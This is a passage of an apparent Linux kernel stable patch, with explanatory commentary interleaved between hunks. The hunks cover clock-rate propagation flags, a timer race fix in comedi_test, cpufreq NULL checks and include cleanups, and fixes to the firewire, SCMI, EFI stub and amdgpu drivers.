+-	DIV(CLK_DOUT_CMGP_USI1, "dout_cmgp_usi1", "mout_cmgp_usi1",
+-	    CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP1, 0, 5),
++	DIV_F(CLK_DOUT_CMGP_USI0, "dout_cmgp_usi0", "mout_cmgp_usi0",
++	      CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP0, 0, 5, CLK_SET_RATE_PARENT, 0),
++	DIV_F(CLK_DOUT_CMGP_USI1, "dout_cmgp_usi1", "mout_cmgp_usi1",
++	      CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP1, 0, 5, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_gate_clock cmgp_gate_clks[] __initconst = {
+@@ -963,12 +963,12 @@ static const struct samsung_gate_clock cmgp_gate_clks[] __initconst = {
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_GPIO_PCLK, 21, CLK_IGNORE_UNUSED, 0),
+ 	GATE(CLK_GOUT_CMGP_USI0_IPCLK, "gout_cmgp_usi0_ipclk", "dout_cmgp_usi0",
+-	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CMGP_USI0_PCLK, "gout_cmgp_usi0_pclk",
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_CMGP_USI1_IPCLK, "gout_cmgp_usi1_ipclk", "dout_cmgp_usi1",
+-	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CMGP_USI1_PCLK, "gout_cmgp_usi1_pclk",
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_PCLK, 21, 0, 0),
+@@ -1409,8 +1409,9 @@ static const struct samsung_mux_clock peri_mux_clks[] __initconst = {
+ 	    mout_peri_uart_user_p, PLL_CON0_MUX_CLKCMU_PERI_UART_USER, 4, 1),
+ 	MUX(CLK_MOUT_PERI_HSI2C_USER, "mout_peri_hsi2c_user",
+ 	    mout_peri_hsi2c_user_p, PLL_CON0_MUX_CLKCMU_PERI_HSI2C_USER, 4, 1),
+-	MUX(CLK_MOUT_PERI_SPI_USER, "mout_peri_spi_user", mout_peri_spi_user_p,
+-	    PLL_CON0_MUX_CLKCMU_PERI_SPI_USER, 4, 1),
++	MUX_F(CLK_MOUT_PERI_SPI_USER, "mout_peri_spi_user",
++	      mout_peri_spi_user_p, PLL_CON0_MUX_CLKCMU_PERI_SPI_USER, 4, 1,
++	      CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_div_clock peri_div_clks[] __initconst = {
+@@ -1420,8 +1421,8 @@ static const struct samsung_div_clock peri_div_clks[] __initconst = {
+ 	    CLK_CON_DIV_DIV_CLK_PERI_HSI2C_1, 0, 5),
+ 	DIV(CLK_DOUT_PERI_HSI2C2, "dout_peri_hsi2c2", "gout_peri_hsi2c2",
+ 	    CLK_CON_DIV_DIV_CLK_PERI_HSI2C_2, 0, 5),
+-	DIV(CLK_DOUT_PERI_SPI0, "dout_peri_spi0", "mout_peri_spi_user",
+-	    CLK_CON_DIV_DIV_CLK_PERI_SPI_0, 0, 5),
++	DIV_F(CLK_DOUT_PERI_SPI0, "dout_peri_spi0", "mout_peri_spi_user",
++	      CLK_CON_DIV_DIV_CLK_PERI_SPI_0, 0, 5, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_gate_clock peri_gate_clks[] __initconst = {
+@@ -1463,7 +1464,7 @@ static const struct samsung_gate_clock peri_gate_clks[] __initconst = {
+ 	     "mout_peri_bus_user",
+ 	     CLK_CON_GAT_GOUT_PERI_PWM_MOTOR_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_SPI0_IPCLK, "gout_spi0_ipclk", "dout_peri_spi0",
+-	     CLK_CON_GAT_GOUT_PERI_SPI_0_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_PERI_SPI_0_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_SPI0_PCLK, "gout_spi0_pclk", "mout_peri_bus_user",
+ 	     CLK_CON_GAT_GOUT_PERI_SPI_0_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_SYSREG_PERI_PCLK, "gout_sysreg_peri_pclk",
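
The whole Exynos850 hunk is one idea applied along two clock paths: CLK_SET_RATE_PARENT lets a clk_set_rate() call on a leaf clock (the SPI and USI IP clocks) propagate up through gate, divider and mux until it reaches a node that can actually retune, instead of stopping at the first non-propagating clock and leaving the peripheral at a default rate. A minimal kernel-style illustration (function name is an assumption):

/* Succeeds in retuning the upstream divider only if every clock from
 * the leaf up to a tunable parent carries CLK_SET_RATE_PARENT, e.g.
 * gout_spi0_ipclk -> dout_peri_spi0 -> mout_peri_spi_user. */
static int spi_tune_ipclk(struct clk *spi_ipclk, unsigned long hz)
{
	return clk_set_rate(spi_ipclk, hz);
}
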
+diff --git a/drivers/clk/zynq/clkc.c b/drivers/clk/zynq/clkc.c
+index 7bdeaff2bfd68..c28d3dacf0fb2 100644
+--- a/drivers/clk/zynq/clkc.c
++++ b/drivers/clk/zynq/clkc.c
+@@ -42,6 +42,7 @@ static void __iomem *zynq_clkc_base;
+ #define SLCR_SWDT_CLK_SEL		(zynq_clkc_base + 0x204)
+ 
+ #define NUM_MIO_PINS	54
++#define CLK_NAME_LEN	16
+ 
+ #define DBG_CLK_CTRL_CLKACT_TRC		BIT(0)
+ #define DBG_CLK_CTRL_CPU_1XCLKACT	BIT(1)
+@@ -215,7 +216,7 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 	int i;
+ 	u32 tmp;
+ 	int ret;
+-	char *clk_name;
++	char clk_name[CLK_NAME_LEN];
+ 	unsigned int fclk_enable = 0;
+ 	const char *clk_output_name[clk_max];
+ 	const char *cpu_parents[4];
+@@ -426,12 +427,10 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 			"gem1_emio_mux", CLK_SET_RATE_PARENT,
+ 			SLCR_GEM1_CLK_CTRL, 0, 0, &gem1clk_lock);
+ 
+-	tmp = strlen("mio_clk_00x");
+-	clk_name = kmalloc(tmp, GFP_KERNEL);
+ 	for (i = 0; i < NUM_MIO_PINS; i++) {
+ 		int idx;
+ 
+-		snprintf(clk_name, tmp, "mio_clk_%2.2d", i);
++		snprintf(clk_name, CLK_NAME_LEN, "mio_clk_%2.2d", i);
+ 		idx = of_property_match_string(np, "clock-names", clk_name);
+ 		if (idx >= 0)
+ 			can_mio_mux_parents[i] = of_clk_get_parent_name(np,
+@@ -439,7 +438,6 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 		else
+ 			can_mio_mux_parents[i] = dummy_nm;
+ 	}
+-	kfree(clk_name);
+ 	clk_register_mux(NULL, "can_mux", periph_parents, 4,
+ 			CLK_SET_RATE_NO_REPARENT, SLCR_CAN_CLK_CTRL, 4, 2, 0,
+ 			&canclk_lock);
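
The zynq fix trades an unchecked kmalloc() for a 16-byte stack buffer: the name "mio_clk_NN" is bounded and short-lived (of_property_match_string() only reads it), so the heap allocation bought nothing but a possible NULL dereference and a kfree(). Runnable sketch of the resulting loop:

#include <stdio.h>

#define CLK_NAME_LEN 16
#define NUM_MIO_PINS 54

int main(void)
{
	char clk_name[CLK_NAME_LEN];	/* no allocation, nothing to fail */

	for (int i = 0; i < NUM_MIO_PINS; i++) {
		snprintf(clk_name, CLK_NAME_LEN, "mio_clk_%2.2d", i);
		/* ... look up clk_name in the clock-names property ... */
	}
	printf("last name: %s\n", clk_name);	/* mio_clk_53 */
	return 0;
}
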
+diff --git a/drivers/comedi/drivers/comedi_test.c b/drivers/comedi/drivers/comedi_test.c
+index 0b5c0af1cebf0..626d53bf9146a 100644
+--- a/drivers/comedi/drivers/comedi_test.c
++++ b/drivers/comedi/drivers/comedi_test.c
+@@ -85,6 +85,8 @@ struct waveform_private {
+ 	struct comedi_device *dev;	/* parent comedi device */
+ 	u64 ao_last_scan_time;		/* time of previous AO scan in usec */
+ 	unsigned int ao_scan_period;	/* AO scan period in usec */
++	bool ai_timer_enable:1;		/* should AI timer be running? */
++	bool ao_timer_enable:1;		/* should AO timer be running? */
+ 	unsigned short ao_loopbacks[N_CHANS];
+ };
+ 
+@@ -234,8 +236,12 @@ static void waveform_ai_timer(struct timer_list *t)
+ 			time_increment = devpriv->ai_convert_time - now;
+ 		else
+ 			time_increment = 1;
+-		mod_timer(&devpriv->ai_timer,
+-			  jiffies + usecs_to_jiffies(time_increment));
++		spin_lock(&dev->spinlock);
++		if (devpriv->ai_timer_enable) {
++			mod_timer(&devpriv->ai_timer,
++				  jiffies + usecs_to_jiffies(time_increment));
++		}
++		spin_unlock(&dev->spinlock);
+ 	}
+ 
+ overrun:
+@@ -391,9 +397,12 @@ static int waveform_ai_cmd(struct comedi_device *dev,
+ 	 * Seem to need an extra jiffy here, otherwise timer expires slightly
+ 	 * early!
+ 	 */
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ai_timer_enable = true;
+ 	devpriv->ai_timer.expires =
+ 		jiffies + usecs_to_jiffies(devpriv->ai_convert_period) + 1;
+ 	add_timer(&devpriv->ai_timer);
++	spin_unlock_bh(&dev->spinlock);
+ 	return 0;
+ }
+ 
+@@ -402,6 +411,9 @@ static int waveform_ai_cancel(struct comedi_device *dev,
+ {
+ 	struct waveform_private *devpriv = dev->private;
+ 
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ai_timer_enable = false;
++	spin_unlock_bh(&dev->spinlock);
+ 	if (in_softirq()) {
+ 		/* Assume we were called from the timer routine itself. */
+ 		del_timer(&devpriv->ai_timer);
+@@ -493,8 +505,12 @@ static void waveform_ao_timer(struct timer_list *t)
+ 		unsigned int time_inc = devpriv->ao_last_scan_time +
+ 					devpriv->ao_scan_period - now;
+ 
+-		mod_timer(&devpriv->ao_timer,
+-			  jiffies + usecs_to_jiffies(time_inc));
++		spin_lock(&dev->spinlock);
++		if (devpriv->ao_timer_enable) {
++			mod_timer(&devpriv->ao_timer,
++				  jiffies + usecs_to_jiffies(time_inc));
++		}
++		spin_unlock(&dev->spinlock);
+ 	}
+ 
+ underrun:
+@@ -515,9 +531,12 @@ static int waveform_ao_inttrig_start(struct comedi_device *dev,
+ 	async->inttrig = NULL;
+ 
+ 	devpriv->ao_last_scan_time = ktime_to_us(ktime_get());
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ao_timer_enable = true;
+ 	devpriv->ao_timer.expires =
+ 		jiffies + usecs_to_jiffies(devpriv->ao_scan_period);
+ 	add_timer(&devpriv->ao_timer);
++	spin_unlock_bh(&dev->spinlock);
+ 
+ 	return 1;
+ }
+@@ -602,6 +621,9 @@ static int waveform_ao_cancel(struct comedi_device *dev,
+ 	struct waveform_private *devpriv = dev->private;
+ 
+ 	s->async->inttrig = NULL;
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ao_timer_enable = false;
++	spin_unlock_bh(&dev->spinlock);
+ 	if (in_softirq()) {
+ 		/* Assume we were called from the timer routine itself. */
+ 		del_timer(&devpriv->ao_timer);
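
The comedi_test hunks fix a classic timer race: a cancel could run del_timer() while the callback was mid-flight on another CPU, and the callback's unconditional mod_timer() would then resurrect the supposedly dead timer. The cure is an enable flag flipped and tested under the same spinlock, so a cancelled timer can never re-arm itself. The pattern in isolation (struct my_dev and its fields are hypothetical):

/* Kernel-style sketch of the guarded re-arm pattern. */
static void my_timer_fn(struct timer_list *t)
{
	struct my_dev *dev = from_timer(dev, t, timer);

	/* ... periodic work ... */

	spin_lock(&dev->lock);
	if (dev->timer_enable)		/* refuse to resurrect after cancel */
		mod_timer(&dev->timer, jiffies + dev->period);
	spin_unlock(&dev->lock);
}

static void my_cancel(struct my_dev *dev)
{
	spin_lock_bh(&dev->lock);
	dev->timer_enable = false;	/* callback will no longer re-arm */
	spin_unlock_bh(&dev->lock);
	del_timer_sync(&dev->timer);
}

The driver itself calls plain del_timer() when cancel runs from the timer's own softirq context, where del_timer_sync() would deadlock; the flag is what makes that safe.
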
+diff --git a/drivers/cpufreq/armada-37xx-cpufreq.c b/drivers/cpufreq/armada-37xx-cpufreq.c
+index b74289a95a171..bea41ccabf1f0 100644
+--- a/drivers/cpufreq/armada-37xx-cpufreq.c
++++ b/drivers/cpufreq/armada-37xx-cpufreq.c
+@@ -14,10 +14,8 @@
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/mfd/syscon.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+-#include <linux/of_address.h>
+-#include <linux/of_device.h>
+-#include <linux/of_irq.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index f644c5e325fb2..38ec0fedb247f 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -481,6 +481,8 @@ static bool brcm_avs_is_firmware_loaded(struct private_data *priv)
+ static unsigned int brcm_avs_cpufreq_get(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
++	if (!policy)
++		return 0;
+ 	struct private_data *priv = policy->driver_data;
+ 
+ 	cpufreq_cpu_put(policy);
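
cpufreq_cpu_get() can return NULL (no policy yet, e.g. around CPU hotplug) and, when it succeeds, takes a reference that must be paired with cpufreq_cpu_put(). The added check avoids the NULL dereference; note that as backported it lands before the priv declaration, which is valid under the kernel's gnu11 dialect but trips -Wdeclaration-after-statement, so expect a cosmetic warning here. The intended get/put discipline, sketched:

/* Kernel-style sketch: bail out on a missing policy, balance the ref. */
static unsigned int cur_freq(unsigned int cpu)
{
	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
	unsigned int freq;

	if (!policy)
		return 0;		/* nothing registered for this CPU */

	freq = policy->cur;
	cpufreq_cpu_put(policy);	/* drop the reference taken by _get */
	return freq;
}
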
+diff --git a/drivers/cpufreq/mediatek-cpufreq-hw.c b/drivers/cpufreq/mediatek-cpufreq-hw.c
+index f0e0a35c7f217..7f326bb5fd8de 100644
+--- a/drivers/cpufreq/mediatek-cpufreq-hw.c
++++ b/drivers/cpufreq/mediatek-cpufreq-hw.c
+@@ -10,8 +10,10 @@
+ #include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+-#include <linux/of_address.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
++#include <linux/regulator/consumer.h>
+ #include <linux/slab.h>
+ 
+ #define LUT_MAX_ENTRIES			32U
+@@ -295,7 +297,23 @@ static struct cpufreq_driver cpufreq_mtk_hw_driver = {
+ static int mtk_cpufreq_hw_driver_probe(struct platform_device *pdev)
+ {
+ 	const void *data;
+-	int ret;
++	int ret, cpu;
++	struct device *cpu_dev;
++	struct regulator *cpu_reg;
++
++	/* Make sure that all CPU supplies are available before proceeding. */
++	for_each_possible_cpu(cpu) {
++		cpu_dev = get_cpu_device(cpu);
++		if (!cpu_dev)
++			return dev_err_probe(&pdev->dev, -EPROBE_DEFER,
++					     "Failed to get cpu%d device\n", cpu);
++
++		cpu_reg = devm_regulator_get(cpu_dev, "cpu");
++		if (IS_ERR(cpu_reg))
++			return dev_err_probe(&pdev->dev, PTR_ERR(cpu_reg),
++					     "CPU%d regulator get failed\n", cpu);
++	}
++
+ 
+ 	data = of_device_get_match_data(&pdev->dev);
+ 	if (!data)
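
The mediatek probe change front-loads the regulator lookups so the driver defers, rather than half-initializes, when a CPU supply is not yet available. dev_err_probe() both returns the error and records it; for -EPROBE_DEFER it logs the deferral reason quietly instead of spamming dmesg at error level, which is why it is preferred over dev_err() plus return in probe paths. Condensed sketch of the loop (function name is mine):

/* Defer probing until every CPU's "cpu" supply can be acquired. */
static int check_cpu_supplies(struct platform_device *pdev)
{
	int cpu;

	for_each_possible_cpu(cpu) {
		struct device *cpu_dev = get_cpu_device(cpu);
		struct regulator *reg;

		if (!cpu_dev)
			return dev_err_probe(&pdev->dev, -EPROBE_DEFER,
					     "no device for cpu%d\n", cpu);

		reg = devm_regulator_get(cpu_dev, "cpu");
		if (IS_ERR(reg))	/* includes -EPROBE_DEFER */
			return dev_err_probe(&pdev->dev, PTR_ERR(reg),
					     "cpu%d supply not ready\n", cpu);
	}
	return 0;
}
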
+diff --git a/drivers/cpufreq/ppc_cbe_cpufreq.c b/drivers/cpufreq/ppc_cbe_cpufreq.c
+index e3313ce63b388..88afc49941b71 100644
+--- a/drivers/cpufreq/ppc_cbe_cpufreq.c
++++ b/drivers/cpufreq/ppc_cbe_cpufreq.c
+@@ -9,7 +9,7 @@
+ 
+ #include <linux/cpufreq.h>
+ #include <linux/module.h>
+-#include <linux/of_platform.h>
++#include <linux/of.h>
+ 
+ #include <asm/machdep.h>
+ #include <asm/cell-regs.h>
+diff --git a/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c b/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
+index 4fba3637b115c..6f0c32592416d 100644
+--- a/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
++++ b/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
+@@ -11,7 +11,6 @@
+ #include <linux/types.h>
+ #include <linux/timer.h>
+ #include <linux/init.h>
+-#include <linux/of_platform.h>
+ #include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ 
+diff --git a/drivers/cpufreq/qcom-cpufreq-nvmem.c b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+index a577586b23be2..cb03bfb0435ea 100644
+--- a/drivers/cpufreq/qcom-cpufreq-nvmem.c
++++ b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+@@ -22,7 +22,6 @@
+ #include <linux/module.h>
+ #include <linux/nvmem-consumer.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_opp.h>
+diff --git a/drivers/cpufreq/scpi-cpufreq.c b/drivers/cpufreq/scpi-cpufreq.c
+index fd2c16821d54c..ac719aca49b75 100644
+--- a/drivers/cpufreq/scpi-cpufreq.c
++++ b/drivers/cpufreq/scpi-cpufreq.c
+@@ -14,7 +14,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/export.h>
+ #include <linux/module.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/scpi_protocol.h>
+ #include <linux/slab.h>
+diff --git a/drivers/cpufreq/sti-cpufreq.c b/drivers/cpufreq/sti-cpufreq.c
+index 1a63aeea87112..9c542e723a157 100644
+--- a/drivers/cpufreq/sti-cpufreq.c
++++ b/drivers/cpufreq/sti-cpufreq.c
+@@ -13,7 +13,7 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+ 
+diff --git a/drivers/cpufreq/ti-cpufreq.c b/drivers/cpufreq/ti-cpufreq.c
+index f64180dd2005b..61ef653bcf56f 100644
+--- a/drivers/cpufreq/ti-cpufreq.c
++++ b/drivers/cpufreq/ti-cpufreq.c
+@@ -12,7 +12,7 @@
+ #include <linux/module.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+diff --git a/drivers/cpufreq/vexpress-spc-cpufreq.c b/drivers/cpufreq/vexpress-spc-cpufreq.c
+index d295f405c4bb0..865e501648034 100644
+--- a/drivers/cpufreq/vexpress-spc-cpufreq.c
++++ b/drivers/cpufreq/vexpress-spc-cpufreq.c
+@@ -18,7 +18,6 @@
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+-#include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/slab.h>
+diff --git a/drivers/crypto/xilinx/zynqmp-aes-gcm.c b/drivers/crypto/xilinx/zynqmp-aes-gcm.c
+index bf1f421e05f25..74bd3eb63734d 100644
+--- a/drivers/crypto/xilinx/zynqmp-aes-gcm.c
++++ b/drivers/crypto/xilinx/zynqmp-aes-gcm.c
+@@ -231,7 +231,10 @@ static int zynqmp_handle_aes_req(struct crypto_engine *engine,
+ 		err = zynqmp_aes_aead_cipher(areq);
+ 	}
+ 
++	local_bh_disable();
+ 	crypto_finalize_aead_request(engine, areq, err);
++	local_bh_enable();
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index 81de833ccd041..66ef0a1114845 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -665,16 +665,16 @@ config TEGRA20_APB_DMA
+ 
+ config TEGRA210_ADMA
+ 	tristate "NVIDIA Tegra210 ADMA support"
+-	depends on (ARCH_TEGRA_210_SOC || COMPILE_TEST)
++	depends on (ARCH_TEGRA || COMPILE_TEST)
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+-	  Support for the NVIDIA Tegra210 ADMA controller driver. The
+-	  DMA controller has multiple DMA channels and is used to service
+-	  various audio clients in the Tegra210 audio processing engine
+-	  (APE). This DMA controller transfers data from memory to
+-	  peripheral and vice versa. It does not support memory to
+-	  memory data transfer.
++	  Support for the NVIDIA Tegra210/Tegra186/Tegra194/Tegra234 ADMA
++	  controller driver. The DMA controller has multiple DMA channels
++	  and is used to service various audio clients in the Tegra210
++	  audio processing engine (APE). This DMA controller transfers
++	  data from memory to peripheral and vice versa. It does not
++	  support memory to memory data transfer.
+ 
+ config TIMB_DMA
+ 	tristate "Timberdale FPGA DMA support"
+diff --git a/drivers/firewire/core-card.c b/drivers/firewire/core-card.c
+index 8aaa7fcb2630d..401a77e3b5fa8 100644
+--- a/drivers/firewire/core-card.c
++++ b/drivers/firewire/core-card.c
+@@ -500,7 +500,19 @@ static void bm_work(struct work_struct *work)
+ 		fw_notice(card, "phy config: new root=%x, gap_count=%d\n",
+ 			  new_root_id, gap_count);
+ 		fw_send_phy_config(card, new_root_id, generation, gap_count);
+-		reset_bus(card, true);
++		/*
++		 * Where possible, use a short bus reset to minimize
++		 * disruption to isochronous transfers. But in the event
++		 * of a gap count inconsistency, use a long bus reset.
++		 *
++		 * As noted in 1394a 8.4.6.2, nodes on a mixed 1394/1394a bus
++		 * may set different gap counts after a bus reset. On a mixed
++		 * 1394/1394a bus, a short bus reset can get doubled. Some
++		 * nodes may treat the double reset as one bus reset and others
++		 * may treat it as two, causing a gap count inconsistency
++		 * again. Using a long bus reset prevents this.
++		 */
++		reset_bus(card, card->gap_count != 0);
+ 		/* Will allocate broadcast channel after the reset. */
+ 		goto out;
+ 	}
+diff --git a/drivers/firmware/arm_scmi/smc.c b/drivers/firmware/arm_scmi/smc.c
+index ac0bd51ef16a2..42ea308a2c1d5 100644
+--- a/drivers/firmware/arm_scmi/smc.c
++++ b/drivers/firmware/arm_scmi/smc.c
+@@ -171,6 +171,13 @@ static int smc_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_smc *scmi_info = cinfo->transport_info;
+ 
++	/*
++	 * Different protocols might share the same chan info, so a previous
++	 * smc_chan_free call might have already freed the structure.
++	 */
++	if (!scmi_info)
++		return 0;
++
+ 	/* Ignore any possible further reception on the IRQ path */
+ 	if (scmi_info->irq > 0)
+ 		free_irq(scmi_info->irq, scmi_info);
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 784e1b2ae5ccd..dc50dda40239e 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -21,6 +21,8 @@
+ #include "efistub.h"
+ #include "x86-stub.h"
+ 
++extern char _bss[], _ebss[];
++
+ const efi_system_table_t *efi_system_table;
+ const efi_dxe_services_table_t *efi_dxe_table;
+ static efi_loaded_image_t *image = NULL;
+@@ -432,6 +434,9 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 	efi_status_t status;
+ 	char *cmdline_ptr;
+ 
++	if (efi_is_native())
++		memset(_bss, 0, _ebss - _bss);
++
+ 	efi_system_table = sys_table_arg;
+ 
+ 	/* Check if we were booted by the EFI firmware */
+@@ -950,8 +955,6 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ void efi_handover_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
+ 			struct boot_params *boot_params)
+ {
+-	extern char _bss[], _ebss[];
+-
+ 	memset(_bss, 0, _ebss - _bss);
+ 	efi_stub_entry(handle, sys_table_arg, boot_params);
+ }
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index 3e8e5f4ffa59f..700f71c954956 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -679,7 +679,8 @@ config GPIO_UNIPHIER
+ 	  Say yes here to support UniPhier GPIOs.
+ 
+ config GPIO_VF610
+-	def_bool y
++	bool "VF610 GPIO support"
++	default y if SOC_VF610
+ 	depends on ARCH_MXC
+ 	select GPIOLIB_IRQCHIP
+ 	help
+diff --git a/drivers/gpu/drm/amd/amdgpu/atom.c b/drivers/gpu/drm/amd/amdgpu/atom.c
+index 1c5d9388ad0bb..cb6eb47aab65b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/atom.c
++++ b/drivers/gpu/drm/amd/amdgpu/atom.c
+@@ -313,7 +313,7 @@ static uint32_t atom_get_src_int(atom_exec_context *ctx, uint8_t attr,
+ 				DEBUG("IMM 0x%02X\n", val);
+ 			return val;
+ 		}
+-		return 0;
++		break;
+ 	case ATOM_ARG_PLL:
+ 		idx = U8(*ptr);
+ 		(*ptr)++;
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 489c89465c78b..c373a2a3248eb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -584,11 +584,34 @@ soc15_asic_reset_method(struct amdgpu_device *adev)
+ 		return AMD_RESET_METHOD_MODE1;
+ }
+ 
++static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg;
++
++	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
++	 * 2) S3 suspend abort and TOS already launched.
++	 */
++	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
++			!adev->suspend_complete &&
++			sol_reg)
++		return true;
++
++	return false;
++}
++
+ static int soc15_asic_reset(struct amdgpu_device *adev)
+ {
+ 	/* original raven doesn't have full asic reset */
+-	if ((adev->apu_flags & AMD_APU_IS_RAVEN) ||
+-	    (adev->apu_flags & AMD_APU_IS_RAVEN2))
++	/* On the latest Raven, the GPU reset can be performed
++	 * successfully. So now, temporarily enable it for the
++	 * S3 suspend abort case.
++	 */
++	if (((adev->apu_flags & AMD_APU_IS_RAVEN) ||
++	    (adev->apu_flags & AMD_APU_IS_RAVEN2)) &&
++		!soc15_need_reset_on_resume(adev))
+ 		return 0;
+ 
+ 	switch (soc15_asic_reset_method(adev)) {
+@@ -1285,24 +1308,6 @@ static int soc15_common_suspend(void *handle)
+ 	return soc15_common_hw_fini(adev);
+ }
+ 
+-static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
+-{
+-	u32 sol_reg;
+-
+-	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
+-
+-	/* Will reset for the following suspend abort cases.
+-	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
+-	 * 2) S3 suspend abort and TOS already launched.
+-	 */
+-	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
+-			!adev->suspend_complete &&
+-			sol_reg)
+-		return true;
+-
+-	return false;
+-}
+-
+ static int soc15_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+index ee242d9d8b060..ff7dd17ad0763 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+@@ -1358,7 +1358,7 @@ static ssize_t dp_dsc_clock_en_read(struct file *f, char __user *buf,
+ 	const uint32_t rd_buf_size = 10;
+ 	struct pipe_ctx *pipe_ctx;
+ 	ssize_t result = 0;
+-	int i, r, str_len = 30;
++	int i, r, str_len = 10;
+ 
+ 	rd_buf = kcalloc(rd_buf_size, sizeof(char), GFP_KERNEL);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
